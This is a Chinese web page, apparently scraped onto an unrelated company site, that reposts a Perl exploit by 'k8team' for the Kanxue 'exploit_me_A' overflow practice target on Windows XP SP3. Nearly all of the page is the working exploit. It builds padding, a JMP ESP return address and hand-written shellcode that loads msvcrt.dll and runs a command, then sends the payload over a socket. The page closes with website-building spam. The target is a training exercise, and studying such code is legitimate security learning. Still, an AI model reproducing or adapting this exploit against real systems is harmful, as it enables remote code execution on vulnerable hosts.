现在的位置: 主页 > 在线留言 > 文章列表

[溢出]Perl 看雪exploit_me_A exploit by k8team

作者:程力专用汽车股份有限公司 来源:www.dfclxwc.com 未知发布时间:2017-09-09 10:31:43
[溢出]Perl 看雪exploit_me_A exploit by k8team


#!/usr/bin/perl

# Perl exploit_me_A exploit by k8team

# Date: 20131018

# Tested on: XPSP3



if (scalar(@ARGV) != 2) { "Usage $0 host port\n"; exit; }

use IO::Socket::INET;



my $JMPESP = "\x12\x45\xFA\x7F";

my $JMPback = "\xb9\x41\x41\x41\x25\xc1\xe9\x14\x2b\xe1\xff\xe4";



#shellcode cmd XP SP3

my $shellcode =

"\x55\x8B\xEC\x33\xC0\x50\x50\x50" .

"\xC6\x45\xF4\x4D" .

"\xC6\x45\xF5\x53" .

"\xC6\x45\xF6\x56" .

"\xC6\x45\xF7\x43" .

"\xC6\x45\xF8\x52" .

"\xC6\x45\xF9\x54" .

"\xC6\x45\xFA\x2E" .

"\xC6\x45\xFB\x44" .

"\xC6\x45\xFC\x4C" .

"\xC6\x45\xFD\x4C" .

"\x8D\x45\xF4\x50\xBA\x7B\x1D\x80\x7C\xFF\xD2" .

"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D" .

"\x89\x45\xF4\xB8\x61\x6E\x64\x2E" .

"\x89\x45\xF8\xB8\x63\x6F\x6D\x22" .

"\x89\x45\xFC\x33\xD2\x88\x55\xFF" .

"\x8D\x45\xF4\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";



#字符串 单引号 和双引号的区别

#"双引号" "\x41" 会转义 成A

#单引号 '\x41' 不会转义 直接输出\x41 这样就4个字节了

#my $a = '\x41' x 190 . "123456AAA2"; #

my $a = "\x41" x 190 . "123456AAA2";



my $payload = $a . $JMPESP . $shellcode;



my $sock = IO::Socket::INET->new("$ARGV[0]:$ARGV[1]") or die "Unable toconnect!\n";



#print $payload;



sleep 1;

print $sock $payload;

print "Exploiting\n";

sleep 2;

print "Done\n";

企业建站2800元起,携手武汉肥猫科技,做一个有见地的颜值派!更多优惠请戳:黄冈网站建设 http://huanggang.45qun.com

上一篇:Codeigniter操作数据库表的优化写法总结 下一篇:最后一页